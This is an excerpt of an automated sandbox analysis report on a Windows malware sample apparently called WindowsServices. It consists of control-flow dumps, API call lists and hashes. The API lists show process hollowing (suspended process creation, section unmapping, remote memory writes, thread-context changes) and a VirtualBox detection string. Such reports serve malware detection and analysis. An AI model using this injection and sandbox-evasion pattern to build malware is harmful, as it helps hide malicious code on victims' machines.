3102->3103 3104 402771 CopyRect 3103->3104 3406 404850 3104->3406 3106 402791 CopyRect 3107 403e10 7 API calls 3106->3107 3108 4027b1 CopyRect 3107->3108 3407 404850 3108->3407 3110 4027d1 CopyRect 3111 403e10 7 API calls 3110->3111 3112 4027f1 CopyRect 3111->3112 3408 404850 3112->3408 3114 402811 CopyRect 3115 403e10 7 API calls 3114->3115 3116 402831 CopyRect 3115->3116 3409 404850 3116->3409 3118 402851 CopyRect 3119 403e10 7 API calls 3118->3119 3120 402871 CopyRect 3119->3120 3410 404850 3120->3410 3122 402891 CopyRect 3123 403e10 7 API calls 3122->3123 3124 4028b1 CopyRect 3123->3124 3411 404850 3124->3411 3126 4028d1 CopyRect 3127 403e10 7 API calls 3126->3127 3128 4028f1 CopyRect 3127->3128 3412 404850 3128->3412 3130 402911 CopyRect 3131 403e10 7 API calls 3130->3131 3132 402931 CopyRect 3131->3132 3413 404850 3132->3413 3134 402951 CopyRect 3135 403e10 7 API calls 3134->3135 3136 402971 CopyRect 3135->3136 3414 404850 3136->3414 3138 402991 CopyRect 3139 403e10 7 API calls 3138->3139 3140 4029b1 CopyRect 3139->3140 3415 404850 3140->3415 3142 4029d1 CopyRect 3143 403e10 7 API calls 3142->3143 3144 4029f1 CopyRect 3143->3144 3416 404850 3144->3416 3146 402a11 CopyRect 3147 403e10 7 API calls 3146->3147 3148 402a31 CopyRect 3147->3148 3417 404850 3148->3417 3150 402a51 CopyRect 3151 403e10 7 API calls 3150->3151 3152 402a71 CopyRect 3151->3152 3418 404850 3152->3418 3154 402a91 CopyRect 3155 403e10 7 API calls 3154->3155 3156 402ab1 CopyRect 3155->3156 3419 404850 3156->3419 3158 402ad1 CopyRect 3159 403e10 7 API calls 3158->3159 3160 402af1 CopyRect 3159->3160 3420 404850 3160->3420 3162 402b11 CopyRect 3163 403e10 7 API calls 3162->3163 3164 402b31 CopyRect 3163->3164 3421 404850 3164->3421 3166 402b51 CopyRect 3167 403e10 7 API calls 3166->3167 3168 402b71 CopyRect 3167->3168 3422 404850 3168->3422 3170 402b91 CopyRect 3171 403e10 7 API calls 3170->3171 3172 402bb1 CopyRect 3171->3172 3423 404850 3172->3423 3174 402bd1 CopyRect 3175 403e10 7 API calls 
3174->3175 3176 402bf1 CopyRect 3175->3176 3424 404850 3176->3424 3178 402c11 CopyRect 3179 403e10 7 API calls 3178->3179 3180 402c31 CopyRect 3179->3180 3425 404850 3180->3425 3182 402c51 CopyRect 3183 403e10 7 API calls 3182->3183 3184 402c71 CopyRect 3183->3184 3426 404850 3184->3426 3186 402c91 CopyRect 3187 403e10 7 API calls 3186->3187 3188 402cb1 CopyRect 3187->3188 3427 404850 3188->3427 3190 402cd1 CopyRect 3191 403e10 7 API calls 3190->3191 3192 402cf1 CopyRect 3191->3192 3428 404850 3192->3428 3194 402d11 CopyRect 3195 403e10 7 API calls 3194->3195 3196 402d31 CopyRect 3195->3196 3429 404850 3196->3429 3198 402d51 CopyRect 3199 403e10 7 API calls 3198->3199 3200 402d71 CopyRect 3199->3200 3430 404850 3200->3430 3202 402d91 CopyRect 3203 403e10 7 API calls 3202->3203 3204 402db1 CopyRect 3203->3204 3431 404850 3204->3431 3206 402dd1 CopyRect 3207 403e10 7 API calls 3206->3207 3208 402df1 CopyRect 3207->3208 3432 404850 3208->3432 3210 402e11 CopyRect 3211 403e10 7 API calls 3210->3211 3212 402e31 CopyRect 3211->3212 3433 404850 3212->3433 3214 402e51 CopyRect 3215 403e10 7 API calls 3214->3215 3216 402e71 CopyRect 3215->3216 3434 404850 3216->3434 3218 402e91 CopyRect 3219 403e10 7 API calls 3218->3219 3220 402eb1 CopyRect 3219->3220 3435 404850 3220->3435 3222 402ed1 CopyRect 3223 403e10 7 API calls 3222->3223 3224 402ef1 CopyRect 3223->3224 3436 404850 3224->3436 3226 402f11 CopyRect 3227 403e10 7 API calls 3226->3227 3228 402f31 CopyRect 3227->3228 3437 404850 3228->3437 3230 402f51 CopyRect 3231 403e10 7 API calls 3230->3231 3232 402f71 CopyRect 3231->3232 3438 404850 3232->3438 3234 402f91 CopyRect 3235 403e10 7 API calls 3234->3235 3236 402fb1 CopyRect 3235->3236 3439 404850 3236->3439 3238 402fd1 CopyRect 3239 403e10 7 API calls 3238->3239 3240 402ff1 CopyRect 3239->3240 3440 404850 3240->3440 3242 403011 CopyRect 3243 403e10 7 API calls 3242->3243 3244 403031 CopyRect 3243->3244 3441 404850 3244->3441 3246 403051 CopyRect 3247 403e10 7 API calls 
3246->3247 3248 403071 CopyRect 3247->3248 3442 404850 3248->3442 3250 403091 CopyRect 3251 403e10 7 API calls 3250->3251 3252 4030b1 CopyRect 3251->3252 3443 404850 3252->3443 3254 4030d1 CopyRect 3255 403e10 7 API calls 3254->3255 3256 4030f1 CopyRect 3255->3256 3444 404850 3256->3444 3258 403111 CopyRect 3259 403e10 7 API calls 3258->3259 3260 403131 CopyRect 3259->3260 3445 404850 3260->3445 3262 403151 CopyRect 3263 403e10 7 API calls 3262->3263 3264 403171 CopyRect 3263->3264 3446 404850 3264->3446 3266 403191 CopyRect 3267 403e10 7 API calls 3266->3267 3268 4031b1 CopyRect 3267->3268 3447 404850 3268->3447 3270 4031d1 CopyRect 3271 403e10 7 API calls 3270->3271 3272 4031f1 CopyRect 3271->3272 3448 404850 3272->3448 3274 403211 CopyRect 3275 403e10 7 API calls 3274->3275 3276 403231 CopyRect 3275->3276 3449 404850 3276->3449 3278 403251 CopyRect 3279 403e10 7 API calls 3278->3279 3280 403271 CopyRect 3279->3280 3450 404850 3280->3450 3282 403291 CopyRect 3283 403e10 7 API calls 3282->3283 3284 4032b1 CopyRect 3283->3284 3451 404850 3284->3451 3286 4032d1 CopyRect 3287 403e10 7 API calls 3286->3287 3288 4032f1 CopyRect 3287->3288 3452 404850 3288->3452 3290 403311 CopyRect 3291 403e10 7 API calls 3290->3291 3292 403331 CopyRect 3291->3292 3453 404850 3292->3453 3294 403351 CopyRect 3295 403e10 7 API calls 3294->3295 3296 403371 CopyRect 3295->3296 3454 404850 3296->3454 3298 403391 CopyRect 3299 403e10 7 API calls 3298->3299 3300 4033b1 CopyRect 3299->3300 3455 404850 3300->3455 3302 4033d1 CopyRect 3303 403e10 7 API calls 3302->3303 3304 4033f1 CopyRect 3303->3304 3456 404850 3304->3456 3306 403411 CopyRect 3307 403e10 7 API calls 3306->3307 3308 403431 CopyRect 3307->3308 3457 404850 3308->3457 3310 403451 CopyRect 3311 403e10 7 API calls 3310->3311 3312 403471 CopyRect 3311->3312 3458 404850 3312->3458 3314 403491 CopyRect 3315 403e10 7 API calls 3314->3315 3316 4034b1 CopyRect 3315->3316 3459 404850 3316->3459 3318 4034d1 CopyRect 3319 403e10 7 API calls 
3318->3319 3320 4034f1 CopyRect 3319->3320 3460 404850 3320->3460 3322 403511 CopyRect 3323 403e10 7 API calls 3322->3323 3324 403531 CopyRect 3323->3324 3461 404850 3324->3461 3326 403551 CopyRect 3327 403e10 7 API calls 3326->3327 3328 403571 CopyRect 3327->3328 3462 404850 3328->3462 3330 403591 CopyRect 3331 403e10 7 API calls 3330->3331 3332 4035b1 CopyRect 3331->3332 3463 404850 3332->3463 3334 4035d1 CopyRect 3335 403e10 7 API calls 3334->3335 3336 4035f1 CopyRect 3335->3336 3464 404850 3336->3464 3338 403611 CopyRect 3339 403e10 7 API calls 3338->3339 3340 403631 CopyRect 3339->3340 3465 404850 3340->3465 3342 403651 CopyRect 3343 403e10 7 API calls 3342->3343 3344 403671 CopyRect 3343->3344 3345 403e10 7 API calls 3344->3345 3346 403691 CopyRect 3345->3346 3466 404360 3346->3466 3348 4036b1 CopyRect 3349 403e10 7 API calls 3348->3349 3350 4036d1 CopyRect 3349->3350 3351 404360 7 API calls 3350->3351 3352 4036f1 CopyRect 3351->3352 3353 403e10 7 API calls 3352->3353 3354 403711 CopyRect 3353->3354 3355 404360 7 API calls 3354->3355 3356 403731 CopyRect 3355->3356 3357 404360 7 API calls 3356->3357 3358 403751 CopyRect 3357->3358 3359 403e10 7 API calls 3358->3359 3360 403771 CopyRect 3359->3360 3361 404360 7 API calls 3360->3361 3362 403791 CopyRect 3361->3362 3363 403e10 7 API calls 3362->3363 3364 4037b1 CopyRect 3363->3364 3365 404360 7 API calls 3364->3365 3366 4037d1 CopyRect 3365->3366 3367 403e10 7 API calls 3366->3367 3368 4037f1 CopyRect 3367->3368 3369 404360 7 API calls 3368->3369 3370 403811 CopyRect 3369->3370 3371 404360 7 API calls 3370->3371 3372 403831 CopyRect 3371->3372 3373 404360 7 API calls 3372->3373 3374 403851 CopyRect 3373->3374 3375 403e10 7 API calls 3374->3375 3376 403871 CopyRect 3375->3376 3377 403e10 7 API calls 3376->3377 3378 403891 CopyRect 3377->3378 3379 404360 7 API calls 3378->3379 3380 4038b1 CopyRect 3379->3380 3381 403e10 7 API calls 3380->3381 3382 4038d1 CopyRect 3381->3382 3383 403e10 7 API calls 3382->3383 3384 
                                                                        Control-flow Graph (rendered graph; node/edge dump omitted. Reachable API calls in this graph include CopyRect, SetWindowRgn, SetCapture, CreatePolygonRgn, CombineRgn, GetWindowRect, ClientToScreen, IsIconic, SendMessageA, GetSystemMetrics, GetClientRect, DrawIcon, CreateCompatibleDC, CreateCompatibleBitmap, LPtoDP, DPtoLP, GetMapMode, BitBlt, DrawTextA, TextOutA, PtVisible, RectVisible, TabbedTextOutA, GrayStringA, Escape, EnableWindow, ReleaseCapture, LoadIconA, Polygon, Polyline, PolyPolygon, GetStartupInfoA, GetModuleHandleA, _controlfp, _initterm, __getmainargs, __setusermatherr, __set_app_type, __p__fmode, __p__commode, _setmbcp, _onexit, __dllonexit, _XcptFilter, _ftol, exit, _exit)
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(0000006B,?), ref: 004074E7
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 004074EA
                                                                        • LoadLibraryA.KERNEL32(0000006B,?), ref: 004074FD
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00407500
                                                                        • LoadLibraryA.KERNEL32(0000006B,Clos), ref: 00407563
                                                                        • LoadLibraryA.KERNELBASE(00000073,StcF), ref: 0040764D
                                                                        • LoadLibraryA.KERNEL32(00000073,StcF), ref: 00407666
                                                                        • LoadLibraryA.KERNEL32(advapi,00000052), ref: 0040767C
                                                                        • LoadLibraryA.KERNEL32(advapi,00000052), ref: 0040768F
                                                                        • LoadLibraryA.KERNEL32(advapi,RuV), ref: 0040769F
                                                                        • LoadLibraryA.KERNEL32(advapi,RuV), ref: 004076B5
                                                                        • LoadLibraryA.KERNEL32(advapi,00000052), ref: 004076C5
                                                                        • LoadLibraryA.KERNEL32(advapi,00000052), ref: 004076D5
                                                                        • LoadLibraryA.KERNEL32(advapi,00000052), ref: 004076E5
                                                                        • LoadLibraryA.KERNEL32(0000006B,?), ref: 004077AC
                                                                        • LoadLibraryA.KERNEL32(0000006B,?), ref: 004077BC
                                                                        • LoadLibraryA.KERNEL32(advapi,0000004F), ref: 004077CC
                                                                        • LoadLibraryA.KERNEL32(advapi,?), ref: 004077E2
                                                                        • LoadLibraryA.KERNEL32(advapi,Allocat), ref: 004077F8
                                                                        • LoadLibraryA.KERNEL32(advapi,EqualSid), ref: 0040780E
                                                                        • LoadLibraryA.KERNEL32(advapi,LookupAccountSidA), ref: 00407824
                                                                        • LoadLibraryA.KERNEL32(0000006B,Clos), ref: 0040783A
                                                                        • LoadLibraryA.KERNEL32(0000006B,?), ref: 0040784A
                                                                        • LoadLibraryA.KERNEL32(0000006B,?), ref: 00407860
                                                                        • LoadLibraryA.KERNEL32(0000006B,Clos), ref: 00407876
                                                                        • LoadLibraryA.KERNELBASE(psapi.dll,?), ref: 00407A43
                                                                        • GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 00407AFB
                                                                        • wcscpy.MSVCRT ref: 00407B17
                                                                        • wcscpy.MSVCRT ref: 00407F50
                                                                        • wcscat.MSVCRT ref: 00407F7A
                                                                        • wcscpy.MSVCRT ref: 00407F8A
                                                                        • wcscat.MSVCRT ref: 00407F9E
                                                                        • wcscat.MSVCRT ref: 00408144
                                                                        • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0040817F
                                                                        • Wow64GetThreadContext.KERNEL32 ref: 004081A2
                                                                        • NtReadVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 004081BE
                                                                        • NtUnmapViewOfSection.NTDLL(?,?), ref: 004081CF
                                                                        • NtUnmapViewOfSection.NTDLL(?,?), ref: 004081E0
                                                                        • NtUnmapViewOfSection.NTDLL(?,?), ref: 004081FF
                                                                        • NtUnmapViewOfSection.NTDLL(?,?), ref: 0040820D
                                                                        • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 00408288
                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 004082BF
                                                                        • VirtualAllocEx.KERNELBASE(?,-FFF00000,00100000,00003000,00000040,?,00003000,00000040), ref: 004082EE
                                                                        • WriteProcessMemory.KERNEL32(?,00000000,.dll,00000190,00000000,?,00003000,00000040), ref: 00408306
                                                                        • WriteProcessMemory.KERNELBASE(?,00000000,.dll,?,00000000,?,00003000,00000040), ref: 00408317
                                                                        • WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?,00003000,00000040), ref: 00408353
                                                                        • WriteProcessMemory.KERNELBASE(?,0000002E,0000006B,?,00000000,?,00003000,00000040), ref: 004083C0
                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,00000004,?,?,00003000,00000040), ref: 004083F5
                                                                        • Wow64SetThreadContext.KERNEL32(?,00010007,?,00003000,00000040), ref: 0040841A
                                                                        • WriteProcessMemory.KERNELBASE(?,00000050,?,00000004,00000000,?,00003000,00000040), ref: 00408480
                                                                        • ResumeThread.KERNELBASE(?,?,00003000,00000040), ref: 00408486
                                                                        • Wow64SuspendThread.KERNEL32(?,?,00003000,00000040), ref: 00408490
                                                                        • WriteProcessMemory.KERNELBASE(?,00000050,?,00000004,00000000,?,00003000,00000040), ref: 004084B5
                                                                        • wcscpy.MSVCRT ref: 00408760
                                                                        • wcscat.MSVCRT ref: 00408774
                                                                        • MoveFileExW.KERNELBASE(?,?,00000008), ref: 0040878D
                                                                        • CopyFileW.KERNELBASE(?,?,00000000), ref: 004087A3
                                                                        • ResumeThread.KERNELBASE(?), ref: 004087FC
                                                                        • Sleep.KERNELBASE(00000002), ref: 00408815
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 00408837
                                                                        • Module32First.KERNEL32(00000000,00000000), ref: 004088AC
                                                                        • strstr.MSVCRT ref: 004088D6
                                                                        • Wow64SuspendThread.KERNEL32(?), ref: 00408904
                                                                        • Wow64SuspendThread.KERNEL32(?), ref: 0040891F
                                                                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00408926
                                                                        • DeleteFileW.KERNELBASE(?), ref: 00408930
                                                                        • ResumeThread.KERNELBASE(?), ref: 00408949
                                                                        • Sleep.KERNELBASE(00000002), ref: 0040894D
                                                                        • DeleteFileW.KERNELBASE(?), ref: 00408956
                                                                        • Wow64SuspendThread.KERNEL32(?), ref: 0040897B
                                                                        • Sleep.KERNELBASE(00000005), ref: 0040898A
                                                                        • MoveFileExW.KERNELBASE(?,?,00000008), ref: 0040899C
                                                                        • ResumeThread.KERNELBASE(?,?,00003000,00000040), ref: 004089B3
                                                                        • wcscat.MSVCRT ref: 00408A5B
                                                                        • wcsstr.MSVCRT ref: 00408A82
                                                                        • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00408AA2
                                                                        • TerminateProcess.KERNELBASE(00000000), ref: 00408AD9
                                                                        • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000002,00000000,00000000), ref: 00408C6D
                                                                        • CreateFileW.KERNELBASE(00000000,40000000,00000002,00000000,00000003,00000000,00000000), ref: 00408C8E
                                                                        • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00408CAF
                                                                        • CreateFileW.KERNELBASE(00000000,40000000,00000002,00000000,00000005,00000000,00000000), ref: 00408CD2
                                                                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00408CE1
                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00408D72
                                                                        • Process32First.KERNEL32(00000000,00000128), ref: 00408DDC
                                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 00408DF1
                                                                        • strstr.MSVCRT ref: 00408E02
                                                                        • strstr.MSVCRT ref: 00408E16
                                                                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00408E2E
                                                                        • CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00408FB8
                                                                        • CreateFileA.KERNELBASE(00000000,00000000,00000002,00000000,00000003,00000000,00000000), ref: 00408FDA
                                                                        • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00409030
                                                                        • wcslen.MSVCRT ref: 00409045
                                                                        • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040906E
                                                                        • wcscat.MSVCRT ref: 004090E9
                                                                        • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00409108
                                                                        • VirtualAlloc.KERNELBASE(00000000,-00000400,00003000,00000040), ref: 0040912D
                                                                        • ReadFile.KERNELBASE(?,.dll,00000000), ref: 00409151
                                                                        • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 004091BD
                                                                        • VirtualAlloc.KERNELBASE(00000000,00000400,00003000,00000040), ref: 00409294
                                                                        • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 004099EB
                                                                        • Sleep.KERNELBASE(00000320), ref: 004099F6
                                                                        • TerminateProcess.KERNELBASE(?,00000000), ref: 004099FF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000012.00000002.1746539235.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000012.00000002.1746513540.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000012.00000002.1746539235.000000000040E000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000012.00000002.1746539235.0000000000442000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000012.00000002.1746651877.0000000000443000.00000080.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000012.00000002.1746683536.0000000000444000.00000004.00000001.01000000.00000007.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_18_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: LibraryLoad$File$Create$Process$Thread$Memory$Write$VirtualWow64wcscat$Alloc$ChangeCloseFindNotificationResumeSectionSleepSuspendUnmapViewwcscpy$strstr$AddressContextDeleteFirstMoveProcProcess32ReadSnapshotTerminateToolhelp32$CopyModuleModule32NameNextwcslenwcsstr
                                                                        • String ID: $ $ $ $ $ $ $ /c $"$"$"$"$"$"$"$"$",1$'$($)$.$.$.$.$.$.$.$.$.$.$.$.$.dll$/$/$/$0$0$0$2$2$2$2$2$2$2$2$2$2$4$5$5$7$7$<$<$<$<$<$=$>$>$>$>$>$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$Allocat$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$Clos$CopyFil$D$D$D$D$D$Dtl$Duplicat$E$E$E$E$E$E$E$E$E$EqualSid$ExitProc$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$I$I$I$I$IsWow64Proc$L$L$LookupAccountSidA$M$M$M$M$M$M$M$M$M$M$Modul$Modul$Mov$N$N$N$N$N$NtR$NtUnmapVi$O$O$O$O$O$O$O$P$P$P$P$P$P$P$P$P$P$P$P$Proc$Proc$Program Fil$Q$Q$R$R$R$R$R$R$R$Rmr$RuV$RuV$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$Shdt$Sii$Sitbs$StcF$StcF$Susp$Sys$T$T$T$T$T$T$T$T$T$T$T$V$V$V$V$V$VBoxS$VirtualAlloc$VirtualAllocEx$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$Writ$Writ$\$\$\$\$\$\SD_$\cmd.$_$_$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$advapi$b$b$b$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$e$f$f$f$f$f$f$g$g$g$g$g$g$g$h$h$h$h$h$h$h$h$h$h$h$h$h$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$j$k$k$k$k$k$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$myapp.$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$ntdll.dll$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$psapi.dll$q$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$v$v$v$v$w$w$w$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$y$y$y$y$y$y$y$y$y$y$y$y$y$z$z$z
                                                                        • API String ID: 1831195861-1627083277
                                                                        • Opcode ID: 5d7796b2e5e3ecb3d87d144c009cb48b078826e94f245f0edb57868d79b5afd3
                                                                        • Instruction ID: 2c80d00dd46d1456f42e515657256ab332893eb39df263fc7d206d4ca39ac36b
                                                                        • Opcode Fuzzy Hash: 5d7796b2e5e3ecb3d87d144c009cb48b078826e94f245f0edb57868d79b5afd3
                                                                        • Instruction Fuzzy Hash: 0993FE60D086E8D9EB22C768CC587DEBFB55F66304F0441D9D18C77282C6BA5B88CF66
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • SendMessageA.USER32(?,00000080,00000001,?), ref: 0040A2C8
                                                                        • SendMessageA.USER32(?,00000080,00000000,?), ref: 0040A2D9
                                                                        • GetWindowRect.USER32(?,?), ref: 0040A2F1
                                                                          • Part of subcall function 004052C0: CopyRect.USER32(?,004384C8), ref: 004052CD
                                                                        • _ftol.MSVCRT ref: 0040A30F
                                                                        • GetWindowRect.USER32(?,?), ref: 0040A34B
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 00405316
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 0040533E
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 0040535E
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 0040537E
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 0040539E
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 004053BE
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 004053DE
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 004053FE
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 0040541E
                                                                        • SetWindowRgn.USER32(?,0040C340,00000001), ref: 0040A37F
                                                                        Memory Dump Source
                                                                        • Source File: 00000012.00000002.1746539235.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000012.00000002.1746513540.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000012.00000002.1746539235.000000000040E000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000012.00000002.1746539235.0000000000442000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000012.00000002.1746651877.0000000000443000.00000080.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000012.00000002.1746683536.0000000000444000.00000004.00000001.01000000.00000007.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_18_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$Copy$Window$MessageSend$_ftol
                                                                        • String ID:
                                                                        • API String ID: 1452107452-0
                                                                        • Opcode ID: 77d943f6ea96e2ee8d93cdf0a1eb352025076fd503600f4a23e69f77a4334500
                                                                        • Instruction ID: 82604ac88615afb37d6d3c3cd9f472b3106c4a6f90d73964fe7bd466d50d877b
                                                                        • Opcode Fuzzy Hash: 77d943f6ea96e2ee8d93cdf0a1eb352025076fd503600f4a23e69f77a4334500
                                                                        • Instruction Fuzzy Hash: 85315E71204705AFD314DF25C885F6BB7E8FBC8B04F004A2DB585A32C1D678E8098B9A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        [Control-flow graph not reproduced: single basic block 40b2a2-40b2b7 calling 69CE4ED0 (MFC42); legend: Executed / Not Executed]
                                                                        APIs
                                                                        • 69CE4ED0.MFC42(0040B243,0040B243,0040B243,0040B243,0040B243,00000000,?,0000000A), ref: 0040B2B2
                                                                        Memory Dump Source
                                                                        • Source File: 00000012.00000002.1746539235.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000012.00000002.1746513540.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000012.00000002.1746539235.000000000040E000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000012.00000002.1746539235.0000000000442000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000012.00000002.1746651877.0000000000443000.00000080.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000012.00000002.1746683536.0000000000444000.00000004.00000001.01000000.00000007.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_18_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
                                                                        • Instruction ID: 357b4c9800bdd651ee11a6a5109b4e9d846802b8a319b0e0d2e175bba6204330
                                                                        • Opcode Fuzzy Hash: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
                                                                        • Instruction Fuzzy Hash: 17B00836018386ABCB02DE91890592EBAA2BB99304F484C6DB2A5100A187668429BB56
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • IsIconic.USER32(?), ref: 0040A464
                                                                        • SendMessageA.USER32(?,00000027,?,00000000), ref: 0040A49D
                                                                        • GetSystemMetrics.USER32(0000000B), ref: 0040A4AB
                                                                        • GetSystemMetrics.USER32(0000000C), ref: 0040A4B1
                                                                        • GetClientRect.USER32(?,?), ref: 0040A4BE
                                                                        • DrawIcon.USER32(?,?,?,?), ref: 0040A4F6
                                                                        • CreateCompatibleDC.GDI32(?), ref: 0040A5A2
                                                                        • LPtoDP.GDI32(?,?,00000002), ref: 0040A5BE
                                                                        • CreateCompatibleBitmap.GDI32(?,?,?), ref: 0040A5DF
                                                                        • GetMapMode.GDI32(?,0040C6D4,00000000), ref: 0040A606
                                                                        • DPtoLP.GDI32(?,?,00000002), ref: 0040A622
                                                                        • GetWindowRect.USER32(?,?), ref: 0040A66B
                                                                        Memory Dump Source
                                                                        • Source File: 00000012.00000002.1746539235.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000012.00000002.1746513540.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000012.00000002.1746539235.000000000040E000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000012.00000002.1746539235.0000000000442000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000012.00000002.1746651877.0000000000443000.00000080.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000012.00000002.1746683536.0000000000444000.00000004.00000001.01000000.00000007.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_18_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: CompatibleCreateMetricsRectSystem$BitmapClientDrawIconIconicMessageModeSendWindow
